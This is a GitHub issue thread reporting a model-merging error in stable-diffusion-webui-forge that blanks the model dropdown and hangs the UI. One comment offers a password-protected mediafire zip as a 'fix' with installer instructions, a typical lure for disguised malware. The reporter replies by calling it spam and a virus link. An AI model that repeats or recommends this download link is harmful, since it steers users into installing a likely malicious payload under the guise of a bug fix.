### ISSUE TITLE
Merge models error still not fixed and now even more broken

### ISSUE THREAD

**Issue by ssbugman** [lllyasviel/stable-diffusion-webui-forge#1574]
After flux update merging models stoped working.

"Error merging checkpoints: 'NoneType' object has no attribute 'keys'"

Now it stll not fixed, now it become even worse. On pushing merge button chosen model disappear from dropbox "A", it becomes empty and UI hangs on "waiting" after error.
Still "Error merging checkpoints: 'NoneType' object has no attribute 'keys'" but now it also clearing selected model A on start.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ssbugman** [comment]
> Download https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file password: changeme In the installer menu, select "gcc."

Where button to report spam and links to viruses?
